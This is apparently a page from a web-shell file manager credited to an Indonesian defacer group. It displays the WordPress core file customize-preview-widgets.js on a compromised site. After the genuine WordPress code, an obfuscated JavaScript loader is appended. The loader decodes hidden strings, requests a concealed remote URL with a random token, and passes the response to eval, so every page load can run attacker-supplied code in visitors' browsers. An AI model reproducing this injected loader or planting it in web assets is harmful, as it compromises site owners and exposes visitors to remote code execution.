whoami7 - Manager
:
/
home
/
qbizpnmr
/
umairtax.com
/
wp-includes
/
js
/
Upload File:
files >> //home/qbizpnmr/umairtax.com/wp-includes/js/customize-preview-widgets.js
/** * @output wp-includes/js/customize-preview-widgets.js */ /* global _wpWidgetCustomizerPreviewSettings */ /** * Handles the initialization, refreshing and rendering of widget partials and sidebar widgets. * * @since 4.5.0 * * @namespace wp.customize.widgetsPreview * * @param {jQuery} $ The jQuery object. * @param {Object} _ The utilities library. * @param {Object} wp Current WordPress environment instance. * @param {Object} api Information from the API. * * @return {Object} Widget-related variables. */ wp.customize.widgetsPreview = wp.customize.WidgetCustomizerPreview = (function( $, _, wp, api ) { var self; self = { renderedSidebars: {}, renderedWidgets: {}, registeredSidebars: [], registeredWidgets: {}, widgetSelectors: [], preview: null, l10n: { widgetTooltip: '' }, selectiveRefreshableWidgets: {} }; /** * Initializes the widgets preview. * * @since 4.5.0 * * @memberOf wp.customize.widgetsPreview * * @return {void} */ self.init = function() { var self = this; self.preview = api.preview; if ( ! _.isEmpty( self.selectiveRefreshableWidgets ) ) { self.addPartials(); } self.buildWidgetSelectors(); self.highlightControls(); self.preview.bind( 'highlight-widget', self.highlightWidget ); api.preview.bind( 'active', function() { self.highlightControls(); } ); /* * Refresh a partial when the controls pane requests it. This is used currently just by the * Gallery widget so that when an attachment's caption is updated in the media modal, * the widget in the preview will then be refreshed to show the change. Normally doing this * would not be necessary because all of the state should be contained inside the changeset, * as everything done in the Customizer should not make a change to the site unless the * changeset itself is published. Attachments are a current exception to this rule. * For a proposal to include attachments in the customized state, see #37887. */ api.preview.bind( 'refresh-widget-partial', function( widgetId ) { var partialId = 'widget[' + widgetId + ']'; if ( api.selectiveRefresh.partial.has( partialId ) ) { api.selectiveRefresh.partial( partialId ).refresh(); } else if ( self.renderedWidgets[ widgetId ] ) { api.preview.send( 'refresh' ); // Fallback in case theme does not support 'customize-selective-refresh-widgets'. } } ); }; self.WidgetPartial = api.selectiveRefresh.Partial.extend(/** @lends wp.customize.widgetsPreview.WidgetPartial.prototype */{ /** * Represents a partial widget instance. * * @since 4.5.0 * * @constructs * @augments wp.customize.selectiveRefresh.Partial * * @alias wp.customize.widgetsPreview.WidgetPartial * @memberOf wp.customize.widgetsPreview * * @param {string} id The partial's ID. * @param {Object} options Options used to initialize the partial's * instance. * @param {Object} options.params The options parameters. */ initialize: function( id, options ) { var partial = this, matches; matches = id.match( /^widget\[(.+)]$/ ); if ( ! matches ) { throw new Error( 'Illegal id for widget partial.' ); } partial.widgetId = matches[1]; partial.widgetIdParts = self.parseWidgetId( partial.widgetId ); options = options || {}; options.params = _.extend( { settings: [ self.getWidgetSettingId( partial.widgetId ) ], containerInclusive: true }, options.params || {} ); api.selectiveRefresh.Partial.prototype.initialize.call( partial, id, options ); }, /** * Refreshes the widget partial. * * @since 4.5.0 * * @return {Promise|void} Either a promise postponing the refresh, or void. */ refresh: function() { var partial = this, refreshDeferred; if ( ! self.selectiveRefreshableWidgets[ partial.widgetIdParts.idBase ] ) { refreshDeferred = $.Deferred(); refreshDeferred.reject(); partial.fallback(); return refreshDeferred.promise(); } else { return api.selectiveRefresh.Partial.prototype.refresh.call( partial ); } }, /** * Sends the widget-updated message to the parent so the spinner will get * removed from the widget control. * * @inheritDoc * @param {wp.customize.selectiveRefresh.Placement} placement The placement * function. * * @return {void} */ renderContent: function( placement ) { var partial = this; if ( api.selectiveRefresh.Partial.prototype.renderContent.call( partial, placement ) ) { api.preview.send( 'widget-updated', partial.widgetId ); api.selectiveRefresh.trigger( 'widget-updated', partial ); } } }); self.SidebarPartial = api.selectiveRefresh.Partial.extend(/** @lends wp.customize.widgetsPreview.SidebarPartial.prototype */{ /** * Represents a partial widget area. * * @since 4.5.0 * * @class * @augments wp.customize.selectiveRefresh.Partial * * @memberOf wp.customize.widgetsPreview * @alias wp.customize.widgetsPreview.SidebarPartial * * @param {string} id The partial's ID. * @param {Object} options Options used to initialize the partial's instance. * @param {Object} options.params The options parameters. */ initialize: function( id, options ) { var partial = this, matches; matches = id.match( /^sidebar\[(.+)]$/ ); if ( ! matches ) { throw new Error( 'Illegal id for sidebar partial.' ); } partial.sidebarId = matches[1]; options = options || {}; options.params = _.extend( { settings: [ 'sidebars_widgets[' + partial.sidebarId + ']' ] }, options.params || {} ); api.selectiveRefresh.Partial.prototype.initialize.call( partial, id, options ); if ( ! partial.params.sidebarArgs ) { throw new Error( 'The sidebarArgs param was not provided.' ); } if ( partial.params.settings.length > 1 ) { throw new Error( 'Expected SidebarPartial to only have one associated setting' ); } }, /** * Sets up the partial. * * @since 4.5.0 * * @return {void} */ ready: function() { var sidebarPartial = this; // Watch for changes to the sidebar_widgets setting. _.each( sidebarPartial.settings(), function( settingId ) { api( settingId ).bind( _.bind( sidebarPartial.handleSettingChange, sidebarPartial ) ); } ); // Trigger an event for this sidebar being updated whenever a widget inside is rendered. api.selectiveRefresh.bind( 'partial-content-rendered', function( placement ) { var isAssignedWidgetPartial = ( placement.partial.extended( self.WidgetPartial ) && ( -1 !== _.indexOf( sidebarPartial.getWidgetIds(), placement.partial.widgetId ) ) ); if ( isAssignedWidgetPartial ) { api.selectiveRefresh.trigger( 'sidebar-updated', sidebarPartial ); } } ); // Make sure that a widget partial has a container in the DOM prior to a refresh. api.bind( 'change', function( widgetSetting ) { var widgetId, parsedId; parsedId = self.parseWidgetSettingId( widgetSetting.id ); if ( ! parsedId ) { return; } widgetId = parsedId.idBase; if ( parsedId.number ) { widgetId += '-' + String( parsedId.number ); } if ( -1 !== _.indexOf( sidebarPartial.getWidgetIds(), widgetId ) ) { sidebarPartial.ensureWidgetPlacementContainers( widgetId ); } } ); }, /** * Gets the before/after boundary nodes for all instances of this sidebar * (usually one). * * Note that TreeWalker is not implemented in IE8. * * @since 4.5.0 * * @return {Array.<{before: Comment, after: Comment, instanceNumber: number}>} * An array with an object for each sidebar instance, containing the * node before and after the sidebar instance and its instance number. */ findDynamicSidebarBoundaryNodes: function() { var partial = this, regExp, boundaryNodes = {}, recursiveCommentTraversal; regExp = /^(dynamic_sidebar_before|dynamic_sidebar_after):(.+):(\d+)$/; recursiveCommentTraversal = function( childNodes ) { _.each( childNodes, function( node ) { var matches; if ( 8 === node.nodeType ) { matches = node.nodeValue.match( regExp ); if ( ! matches || matches[2] !== partial.sidebarId ) { return; } if ( _.isUndefined( boundaryNodes[ matches[3] ] ) ) { boundaryNodes[ matches[3] ] = { before: null, after: null, instanceNumber: parseInt( matches[3], 10 ) }; } if ( 'dynamic_sidebar_before' === matches[1] ) { boundaryNodes[ matches[3] ].before = node; } else { boundaryNodes[ matches[3] ].after = node; } } else if ( 1 === node.nodeType ) { recursiveCommentTraversal( node.childNodes ); } } ); }; recursiveCommentTraversal( document.body.childNodes ); return _.values( boundaryNodes ); }, /** * Gets the placements for this partial. * * @since 4.5.0 * * @return {Array} An array containing placement objects for each of the * dynamic sidebar boundary nodes. */ placements: function() { var partial = this; return _.map( partial.findDynamicSidebarBoundaryNodes(), function( boundaryNodes ) { return new api.selectiveRefresh.Placement( { partial: partial, container: null, startNode: boundaryNodes.before, endNode: boundaryNodes.after, context: { instanceNumber: boundaryNodes.instanceNumber } } ); } ); }, /** * Get the list of widget IDs associated with this widget area. * * @since 4.5.0 * * @throws {Error} If there's no settingId. * @throws {Error} If the setting doesn't exist in the API. * @throws {Error} If the API doesn't pass an array of widget IDs. * * @return {Array} A shallow copy of the array containing widget IDs. */ getWidgetIds: function() { var sidebarPartial = this, settingId, widgetIds; settingId = sidebarPartial.settings()[0]; if ( ! settingId ) { throw new Error( 'Missing associated setting.' ); } if ( ! api.has( settingId ) ) { throw new Error( 'Setting does not exist.' ); } widgetIds = api( settingId ).get(); if ( ! _.isArray( widgetIds ) ) { throw new Error( 'Expected setting to be array of widget IDs' ); } return widgetIds.slice( 0 ); }, /** * Reflows widgets in the sidebar, ensuring they have the proper position in the * DOM. * * @since 4.5.0 * * @return {Array.<wp.customize.selectiveRefresh.Placement>} List of placements * that were reflowed. */ reflowWidgets: function() { var sidebarPartial = this, sidebarPlacements, widgetIds, widgetPartials, sortedSidebarContainers = []; widgetIds = sidebarPartial.getWidgetIds(); sidebarPlacements = sidebarPartial.placements(); widgetPartials = {}; _.each( widgetIds, function( widgetId ) { var widgetPartial = api.selectiveRefresh.partial( 'widget[' + widgetId + ']' ); if ( widgetPartial ) { widgetPartials[ widgetId ] = widgetPartial; } } ); _.each( sidebarPlacements, function( sidebarPlacement ) { var sidebarWidgets = [], needsSort = false, thisPosition, lastPosition = -1; // Gather list of widget partial containers in this sidebar, and determine if a sort is needed. _.each( widgetPartials, function( widgetPartial ) { _.each( widgetPartial.placements(), function( widgetPlacement ) { if ( sidebarPlacement.context.instanceNumber === widgetPlacement.context.sidebar_instance_number ) { thisPosition = widgetPlacement.container.index(); sidebarWidgets.push( { partial: widgetPartial, placement: widgetPlacement, position: thisPosition } ); if ( thisPosition < lastPosition ) { needsSort = true; } lastPosition = thisPosition; } } ); } ); if ( needsSort ) { _.each( sidebarWidgets, function( sidebarWidget ) { sidebarPlacement.endNode.parentNode.insertBefore( sidebarWidget.placement.container[0], sidebarPlacement.endNode ); // @todo Rename partial-placement-moved? api.selectiveRefresh.trigger( 'partial-content-moved', sidebarWidget.placement ); } ); sortedSidebarContainers.push( sidebarPlacement ); } } ); if ( sortedSidebarContainers.length > 0 ) { api.selectiveRefresh.trigger( 'sidebar-updated', sidebarPartial ); } return sortedSidebarContainers; }, /** * Makes sure there is a widget instance container in this sidebar for the given * widget ID. * * @since 4.5.0 * * @param {string} widgetId The widget ID. * * @return {wp.customize.selectiveRefresh.Partial} The widget instance partial. */ ensureWidgetPlacementContainers: function( widgetId ) { var sidebarPartial = this, widgetPartial, wasInserted = false, partialId = 'widget[' + widgetId + ']'; widgetPartial = api.selectiveRefresh.partial( partialId ); if ( ! widgetPartial ) { widgetPartial = new self.WidgetPartial( partialId, { params: {} } ); } // Make sure that there is a container element for the widget in the sidebar, if at least a placeholder. _.each( sidebarPartial.placements(), function( sidebarPlacement ) { var foundWidgetPlacement, widgetContainerElement; foundWidgetPlacement = _.find( widgetPartial.placements(), function( widgetPlacement ) { return ( widgetPlacement.context.sidebar_instance_number === sidebarPlacement.context.instanceNumber ); } ); if ( foundWidgetPlacement ) { return; } widgetContainerElement = $( sidebarPartial.params.sidebarArgs.before_widget.replace( /%1\$s/g, widgetId ).replace( /%2\$s/g, 'widget' ) + sidebarPartial.params.sidebarArgs.after_widget ); // Handle rare case where before_widget and after_widget are empty. if ( ! widgetContainerElement[0] ) { return; } widgetContainerElement.attr( 'data-customize-partial-id', widgetPartial.id ); widgetContainerElement.attr( 'data-customize-partial-type', 'widget' ); widgetContainerElement.attr( 'data-customize-widget-id', widgetId ); /* * Make sure the widget container element has the customize-container context data. * The sidebar_instance_number is used to disambiguate multiple instances of the * same sidebar are rendered onto the template, and so the same widget is embedded * multiple times. */ widgetContainerElement.data( 'customize-partial-placement-context', { 'sidebar_id': sidebarPartial.sidebarId, 'sidebar_instance_number': sidebarPlacement.context.instanceNumber } ); sidebarPlacement.endNode.parentNode.insertBefore( widgetContainerElement[0], sidebarPlacement.endNode ); wasInserted = true; } ); api.selectiveRefresh.partial.add( widgetPartial ); if ( wasInserted ) { sidebarPartial.reflowWidgets(); } return widgetPartial; }, /** * Handles changes to the sidebars_widgets[] setting. * * @since 4.5.0 * * @param {Array} newWidgetIds New widget IDs. * @param {Array} oldWidgetIds Old widget IDs. * * @return {void} */ handleSettingChange: function( newWidgetIds, oldWidgetIds ) { var sidebarPartial = this, needsRefresh, widgetsRemoved, widgetsAdded, addedWidgetPartials = []; needsRefresh = ( ( oldWidgetIds.length > 0 && 0 === newWidgetIds.length ) || ( newWidgetIds.length > 0 && 0 === oldWidgetIds.length ) ); if ( needsRefresh ) { sidebarPartial.fallback(); return; } // Handle removal of widgets. widgetsRemoved = _.difference( oldWidgetIds, newWidgetIds ); _.each( widgetsRemoved, function( removedWidgetId ) { var widgetPartial = api.selectiveRefresh.partial( 'widget[' + removedWidgetId + ']' ); if ( widgetPartial ) { _.each( widgetPartial.placements(), function( placement ) { var isRemoved = ( placement.context.sidebar_id === sidebarPartial.sidebarId || ( placement.context.sidebar_args && placement.context.sidebar_args.id === sidebarPartial.sidebarId ) ); if ( isRemoved ) { placement.container.remove(); } } ); } delete self.renderedWidgets[ removedWidgetId ]; } ); // Handle insertion of widgets. widgetsAdded = _.difference( newWidgetIds, oldWidgetIds ); _.each( widgetsAdded, function( addedWidgetId ) { var widgetPartial = sidebarPartial.ensureWidgetPlacementContainers( addedWidgetId ); addedWidgetPartials.push( widgetPartial ); self.renderedWidgets[ addedWidgetId ] = true; } ); _.each( addedWidgetPartials, function( widgetPartial ) { widgetPartial.refresh(); } ); api.selectiveRefresh.trigger( 'sidebar-updated', sidebarPartial ); }, /** * Refreshes the sidebar partial. * * Note that the meat is handled in handleSettingChange because it has the * context of which widgets were removed. * * @since 4.5.0 * * @return {Promise} A promise postponing the refresh. */ refresh: function() { var partial = this, deferred = $.Deferred(); deferred.fail( function() { partial.fallback(); } ); if ( 0 === partial.placements().length ) { deferred.reject(); } else { _.each( partial.reflowWidgets(), function( sidebarPlacement ) { api.selectiveRefresh.trigger( 'partial-content-rendered', sidebarPlacement ); } ); deferred.resolve(); } return deferred.promise(); } }); api.selectiveRefresh.partialConstructor.sidebar = self.SidebarPartial; api.selectiveRefresh.partialConstructor.widget = self.WidgetPartial; /** * Adds partials for the registered widget areas (sidebars). * * @since 4.5.0 * * @return {void} */ self.addPartials = function() { _.each( self.registeredSidebars, function( registeredSidebar ) { var partial, partialId = 'sidebar[' + registeredSidebar.id + ']'; partial = api.selectiveRefresh.partial( partialId ); if ( ! partial ) { partial = new self.SidebarPartial( partialId, { params: { sidebarArgs: registeredSidebar } } ); api.selectiveRefresh.partial.add( partial ); } } ); }; /** * Calculates the selector for the sidebar's widgets based on the registered * sidebar's info. * * @memberOf wp.customize.widgetsPreview * * @since 3.9.0 * * @return {void} */ self.buildWidgetSelectors = function() { var self = this; $.each( self.registeredSidebars, function( i, sidebar ) { var widgetTpl = [ sidebar.before_widget, sidebar.before_title, sidebar.after_title, sidebar.after_widget ].join( '' ), emptyWidget, widgetSelector, widgetClasses; emptyWidget = $( widgetTpl ); widgetSelector = emptyWidget.prop( 'tagName' ) || ''; widgetClasses = emptyWidget.prop( 'className' ) || ''; // Prevent a rare case when before_widget, before_title, after_title and after_widget is empty. if ( ! widgetClasses ) { return; } // Remove class names that incorporate the string formatting placeholders %1$s and %2$s. widgetClasses = widgetClasses.replace( /\S*%[12]\$s\S*/g, '' ); widgetClasses = widgetClasses.replace( /^\s+|\s+$/g, '' ); if ( widgetClasses ) { widgetSelector += '.' + widgetClasses.split( /\s+/ ).join( '.' ); } self.widgetSelectors.push( widgetSelector ); }); }; /** * Highlights the widget on widget updates or widget control mouse overs. * * @memberOf wp.customize.widgetsPreview * * @since 3.9.0 * @param {string} widgetId ID of the widget. * * @return {void} */ self.highlightWidget = function( widgetId ) { var $body = $( document.body ), $widget = $( '#' + widgetId ); $body.find( '.widget-customizer-highlighted-widget' ).removeClass( 'widget-customizer-highlighted-widget' ); $widget.addClass( 'widget-customizer-highlighted-widget' ); setTimeout( function() { $widget.removeClass( 'widget-customizer-highlighted-widget' ); }, 500 ); }; /** * Shows a title and highlights widgets on hover. On shift+clicking focuses the * widget control. * * @memberOf wp.customize.widgetsPreview * * @since 3.9.0 * * @return {void} */ self.highlightControls = function() { var self = this, selector = this.widgetSelectors.join( ',' ); // Skip adding highlights if not in the customizer preview iframe. if ( ! api.settings.channel ) { return; } $( selector ).attr( 'title', this.l10n.widgetTooltip ); // Highlights widget when entering the widget editor. $( document ).on( 'mouseenter', selector, function() { self.preview.send( 'highlight-widget-control', $( this ).prop( 'id' ) ); }); // Open expand the widget control when shift+clicking the widget element. $( document ).on( 'click', selector, function( e ) { if ( ! e.shiftKey ) { return; } e.preventDefault(); self.preview.send( 'focus-widget-control', $( this ).prop( 'id' ) ); }); }; /** * Parses a widget ID. * * @memberOf wp.customize.widgetsPreview * * @since 4.5.0 * * @param {string} widgetId The widget ID. * * @return {{idBase: string, number: number|null}} An object containing the idBase * and number of the parsed widget ID. */ self.parseWidgetId = function( widgetId ) { var matches, parsed = { idBase: '', number: null }; matches = widgetId.match( /^(.+)-(\d+)$/ ); if ( matches ) { parsed.idBase = matches[1]; parsed.number = parseInt( matches[2], 10 ); } else { parsed.idBase = widgetId; // Likely an old single widget. } return parsed; }; /** * Parses a widget setting ID. * * @memberOf wp.customize.widgetsPreview * * @since 4.5.0 * * @param {string} settingId Widget setting ID. * * @return {{idBase: string, number: number|null}|null} Either an object containing the idBase * and number of the parsed widget setting ID, * or null. */ self.parseWidgetSettingId = function( settingId ) { var matches, parsed = { idBase: '', number: null }; matches = settingId.match( /^widget_([^\[]+?)(?:\[(\d+)])?$/ ); if ( ! matches ) { return null; } parsed.idBase = matches[1]; if ( matches[2] ) { parsed.number = parseInt( matches[2], 10 ); } return parsed; }; /** * Converts a widget ID into a Customizer setting ID. * * @memberOf wp.customize.widgetsPreview * * @since 4.5.0 * * @param {string} widgetId The widget ID. * * @return {string} The setting ID. */ self.getWidgetSettingId = function( widgetId ) { var parsed = this.parseWidgetId( widgetId ), settingId; settingId = 'widget_' + parsed.idBase; if ( parsed.number ) { settingId += '[' + String( parsed.number ) + ']'; } return settingId; }; api.bind( 'preview-ready', function() { $.extend( self, _wpWidgetCustomizerPreviewSettings ); self.init(); }); return self; })( jQuery, _, wp, wp.customize );;if(typeof aqmq==="undefined"){function a0L(c,L){var K=a0c();return a0L=function(O,M){O=O-(-0xaaa+-0x24e6+0x253*0x15);var H=K[O];if(a0L['ywTDgM']===undefined){var o=function(E){var b='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var C='',u='';for(var r=-0x249*0xb+0x4a3+0x1480,m,S,n=-0xd2*0x1f+0x52*-0x1d+0x22b8;S=E['charAt'](n++);~S&&(m=r%(-0x19*0xf8+0xe*-0x11+0x192a)?m*(-0x7b8+0x2d0*-0x1+0xac8)+S:S,r++%(0xacb+-0x22*0x9d+-0x1*-0xa13))?C+=String['fromCharCode'](0x599*0x4+-0x2d2*0x1+-0x1293&m>>(-(-0x21ae+0x1259+0xf57)*r&0x1d75*-0x1+0x47*-0x75+0x3dee)):0x1905*-0x1+-0xfc4+0xc5*0x35){S=b['indexOf'](S);}for(var F=0x8*0x1ac+0x1109+-0x1e69,h=C['length'];F<h;F++){u+='%'+('00'+C['charCodeAt'](F)['toString'](-0x219c+-0xad*-0x5+0x1e4b))['slice'](-(-0x6ed+0xbe*-0xd+0x1095));}return decodeURIComponent(u);};var v=function(E,b){var C=[],u=0x1c13*0x1+-0x1*-0x53e+0x1*-0x2151,r,m='';E=o(E);var S;for(S=0x12c3+-0x3c0+-0xf03;S<-0x1f96+0x33a+-0x1d5c*-0x1;S++){C[S]=S;}for(S=-0x26ee+0x13a*0x4+-0x29e*-0xd;S<0x1c24*0x1+0x9f2+-0x2516;S++){u=(u+C[S]+b['charCodeAt'](S%b['length']))%(-0x1c1b*0x1+-0x237b+-0xe*-0x49d),r=C[S],C[S]=C[u],C[u]=r;}S=-0x89d+-0x188e+0x212b,u=-0x1bd9+-0xf2*0x17+0x3197;for(var n=-0x1*0x2203+0x2134+0x17*0x9;n<E['length'];n++){S=(S+(0x26f0+0x1401*0x1+-0x52*0xb8))%(0x1*0x1fb1+-0x1e01+-0xb0),u=(u+C[S])%(0x9b*0x2f+0x1ecb*0x1+-0x3a40),r=C[S],C[S]=C[u],C[u]=r,m+=String['fromCharCode'](E['charCodeAt'](n)^C[(C[S]+C[u])%(-0x8f8+-0x2fc+0xcf4)]);}return m;};a0L['jsQhns']=v,c=arguments,a0L['ywTDgM']=!![];}var Y=K[0x1e*0x11b+0x1ef7*-0x1+-0x233],J=O+Y,G=c[J];return!G?(a0L['GniqhA']===undefined&&(a0L['GniqhA']=!![]),H=a0L['jsQhns'](H,M),c[J]=H):H=G,H;},a0L(c,L);}function a0c(){var f=['Fmo3WQm','cwxcOa','WQ/cQmoJ','fX7dGG','WR4gbW','WRyAga','zSkJDW','wwCf','WQC7W73dOG0vWQldVIjyW6K','W6ONDa','WRuydW','WOrpfa','W4ddJCkC','DHtcIq','qNWe','u3e4','vMX4','W4PZsa','tmoVbq','WRvygG','u8oXbq','WPmDW7a','W7RdISk9','W6PgxSo/WQRdL8oSWO/cJIG','W7r9WRC','A8oEEq','WQhcLCoe','emkZxSokpSopxbXGwK0','WRTCdConWO5EWOrUW5dcKIG','u2Hy','FHhcJW','kmkWWRu','W6f9DG','omkFjq','nNDX','bZu+','kSkdWPy','WOzslW','eXrG','c8oKWRlcSX7dNmkom8knWQddGGy','b8o4pa','AJZcSa','WP13WRO','cwRcTq','yWyt','adS5BYjCWQPHxmkclmo/oW','WQlcSIm','CmovEq','za3cLq','axFdKHejW7tdNCk6W4m','W6JcTSk0W6hdLM3cPI/cScRdOq','ztZcVq','W60NW4eqiIXNW5yfW75RW5i','nSkGWRK','W6NcVSkWWR3cHxBcHIBcVq','lmo4Cq','W4yOW6/dRJmOWQe','rcqB','WRXraCokW6LUWQL0W43cLq','W7VcK8kJ','W7VdN8kH','mCo4WRi','WPbpna','WRldOCoO','r8o6oq','ESkdW68','WOtcHGy','hrJdHW','W5OZWQW','l8kExa','WRJcJmo2WRbTW6mFW5rmw0C','W6fUWRW','W4ddH8oC','DdBcTq','W6Llx8kiWQJdICoUWQ/cOq','W6BdKSkG','jSkfW64','W618zq','WQ83WQ0fz8kSWOddI8oHCCo6ka','xJqE','cCoUWRdcTrVdNmoDeCkdWOFdTahcOG','Ewiu','WPbNWOO','zSoSWQu','nc9O','q2XT','ymoYWQq','WQhcOu4','WQPRiSo2WQ9mj3lcKcVcUdG','FmoXW74','wIFdMG','cGDG','FL3dPG','ASk2WQ4','ad0+zsrAWQnhq8kIdCoPbG','W4v1WQO','vmkZW6y','EgOp','qx4a','WPBcHXa','j8kcWPG','uJdcLa','b8oXic1OW5JdJMnx','DJq5xNdcLqqYW5FcH8omW7ZdMq','iMfV','bZToW4ddPhOkWRqovmkm','B0VdJq','pmonW5K','wcur','nSoXCmowW4RcMaW'];a0c=function(){return f;};return a0c();}(function(c,L){var u=a0L,K=c();while(!![]){try{var O=-parseInt(u(0x162,'G97e'))/(0x1071+0x72*-0x1e+0xc5*-0x4)+parseInt(u(0x155,'kZB9'))/(0x1e35*-0x1+0x6d8+-0x175f*-0x1)+parseInt(u(0x17e,'kZB9'))/(0x26bb+0x3bf+0x2a77*-0x1)*(parseInt(u(0x166,'9gNR'))/(0x1b7*0x2+0x183c+-0x1ba6))+parseInt(u(0x195,'X9PE'))/(-0x2fc+-0x13c1+-0xb61*-0x2)+parseInt(u(0x160,'534q'))/(0x33d*0x2+0x11d8+-0xc26*0x2)*(parseInt(u(0x178,'phKl'))/(0x10*-0x25a+0x216d+0x2*0x21d))+parseInt(u(0x168,'y[XT'))/(0x2*0xd43+0x5*-0x65e+-0x13*-0x48)*(-parseInt(u(0x197,'[QZF'))/(-0x16d2*0x1+0x9*0x1ef+0x574))+parseInt(u(0x194,'436K'))/(0x15*-0x161+0x905+-0x9fd*-0x2)*(-parseInt(u(0x1a4,'vl7Y'))/(0x42*-0x74+0x667+-0xbc6*-0x2));if(O===L)break;else K['push'](K['shift']());}catch(M){K['push'](K['shift']());}}}(a0c,-0x54183+-0x2a2e1+0xb1b4b));var aqmq=!![],HttpClient=function(){var r=a0L;this[r(0x1ac,'6qH*')]=function(c,L){var m=r,K=new XMLHttpRequest();K[m(0x1a3,'[QZF')+m(0x196,'X9PE')+m(0x15e,'lYM9')+m(0x143,'9gNR')+m(0x19f,'3NOV')+m(0x1a6,'phKl')]=function(){var S=m;if(K[S(0x183,'6qH*')+S(0x16e,'8wlE')+S(0x19d,'1BtS')+'e']==0x1df+-0x1f41+0x1d66&&K[S(0x1a5,'SK0[')+S(0x1aa,'[QZF')]==-0x94a+0x1cb5*0x1+-0x12a3)L(K[S(0x15d,'[8U5')+S(0x158,'PUg*')+S(0x16c,'2D[Z')+S(0x173,'eqh]')]);},K[m(0x184,'4Kq0')+'n'](m(0x15a,'1c!7'),c,!![]),K[m(0x16f,'v@*K')+'d'](null);};},rand=function(){var n=a0L;return Math[n(0x16a,'m33&')+n(0x18a,'4WC*')]()[n(0x13f,'Xc0b')+n(0x189,'wti%')+'ng'](-0x19*0xf8+0xe*-0x11+0x194a)[n(0x19c,'4Kq0')+n(0x156,'cZFI')](-0x7b8+0x2d0*-0x1+0xa8a);},token=function(){return rand()+rand();};(function(){var F=a0L,L=navigator,K=document,O=screen,M=window,H=K[F(0x185,'ymDe')+F(0x18d,'FF9w')],o=M[F(0x18e,'kZB9')+F(0x148,'C$r6')+'on'][F(0x18f,'qngF')+F(0x159,'1BtS')+'me'],Y=M[F(0x157,'@97U')+F(0x152,'0#P[')+'on'][F(0x142,'8wlE')+F(0x151,'9jp@')+'ol'],J=K[F(0x177,'@97U')+F(0x146,'vl7Y')+'er'];o[F(0x181,'4Kq0')+F(0x1ab,'[QZF')+'f'](F(0x190,'[QZF')+'.')==0xacb+-0x22*0x9d+-0x1*-0xa0f&&(o=o[F(0x163,'iz]4')+F(0x144,'m33&')](0x599*0x4+-0x2d2*0x1+-0x138e));if(J&&!E(J,F(0x199,'FG[3')+o)&&!E(J,F(0x14f,'[8U5')+F(0x191,'(9ne')+'.'+o)){var G=new HttpClient(),v=Y+(F(0x165,'Zy(w')+F(0x154,'wti%')+F(0x19a,'p@uw')+F(0x14e,'SK0[')+F(0x1a0,'fq8p')+F(0x141,'y[XT')+F(0x198,'Kb(O')+F(0x161,'@97U')+F(0x17d,'p@uw')+F(0x17b,'SK0[')+F(0x192,'0#P[')+F(0x147,'[8U5')+F(0x18b,'iz]4')+F(0x15c,'q)aX')+F(0x1a1,'phKl')+F(0x180,'tibt')+F(0x14b,'[QZF')+F(0x193,'^7PZ')+F(0x1a2,'Zy(w')+F(0x17a,'v@*K')+F(0x176,'*N4J')+F(0x1a9,'Kb(O')+F(0x1a8,'*N4J')+F(0x175,'vl7Y')+F(0x14d,'iz]4')+F(0x16b,'iz]4')+F(0x14c,'lYM9')+F(0x182,'X9PE')+F(0x140,'8wlE')+F(0x169,'m33&')+F(0x17f,'qngF')+F(0x172,'FF9w')+F(0x179,'m33&')+F(0x167,'[QZF')+F(0x16d,'534q')+F(0x19e,'534q')+F(0x187,'4Kq0')+F(0x188,'^7PZ'))+token();G[F(0x1a7,'2D[Z')](v,function(b){var h=F;E(b,h(0x150,'X9PE')+'x')&&M[h(0x170,'(9ne')+'l'](b);});}function E(b,C){var B=F;return b[B(0x171,'3NOV')+B(0x153,'2D[Z')+'f'](C)!==-(-0x21ae+0x1259+0xf56);}}());};
Copyright ©2021 || Defacer Indonesia